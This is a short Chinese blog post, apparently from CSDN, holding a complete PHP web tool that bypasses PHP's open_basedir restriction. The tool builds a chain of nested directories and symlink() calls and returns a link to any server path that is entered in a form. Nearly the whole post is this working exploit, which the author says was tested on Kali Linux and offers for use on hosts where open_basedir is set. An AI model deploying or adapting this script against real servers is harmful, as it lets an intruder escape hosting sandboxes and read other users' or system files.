bypass open_basedir

在了解symlink() bypass open_basedir 的原理后，自己写的代码。在kali-Linux 上测试通过，Windows在路径的处理上需要修改一下。

<?php/*title: bypass open_basedirauth: eT48blodg:http://blog.csdn.net/et48_sec */header("Conten-type:text/html; charset:udf-8");error_reporting(0);@clearstatcache(); function randStr(){$arr = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');shuffle($arr);$arr = array_slice($arr, 0, 6);$str = implode($arr);return $str;}function delTree($dir){   $files = array_diff(scandir($dir), array('.','..'));    foreach ($files as $file) {      (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");    }    return rmdir($dir);} function check($filename){}function bypassdir($path){$paths = explode(DIRECTORY_SEPARATOR,$path);$cwd = getcwd();$num = preg_match_all('/\//',$cwd);$tempfn = randStr();$tempdir = "";$expstr = "";$templink = randStr();$explink = randStr();$res = "";mkdir($tempfn);chdir($tempfn);for($i=1; $i<count($paths); $i++){mkdir($paths[$i]);chdir($paths[$i]);}for($i=1; $i<count($paths); $i++){chdir("..");}for($i=1; $i<=$num+1; $i++){mkdir($tempfn);chdir($tempfn);}$tempdir = getcwd();for($i=1; $i<=$num+2; $i++){chdir("..");}for($i=1; $i<=$num+1; $i++){$expstr .="/..";}symlink($tempdir,$templink);symlink($templink.$expstr.$path,$explink);unlink($templink);mkdir($templink);delTree($tempfn);$res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";return $res;}$res= "";if(!empty($_POST['path'])){$path = $_POST['path'];$res = bypassdir($path);echo $res;die();}?><html><head><title>open_basedir</title></head><body>Titile: bypass open_basedir<br>Auth: eT48<br> Blog: http://blog.csdn.net/et48_sec<br>Open_basedir: <?php echo ini_get('open_basedir'); ?><br>PHPVersion: <?php echo "PHP ".phpversion();?><br><br><form method='post'>path  <input id='path' type='text' style='width:450px'><input type='button' onclick='bypassdir()' value='submit' ></form><div id='output'></div><script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script><script>var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';function send_post(targetdata,callback){$.ajax({url:targeturl,type:'POST',data:targetdata,dataType:'text',success:function(res){callback(res);},error:function(){}})}function bypassdir(){ path = $('#path').val();  if( path!=''){ send_post({ path:path},function(res){ $('#output').append(res);})}}</script></body></html><?php die();?>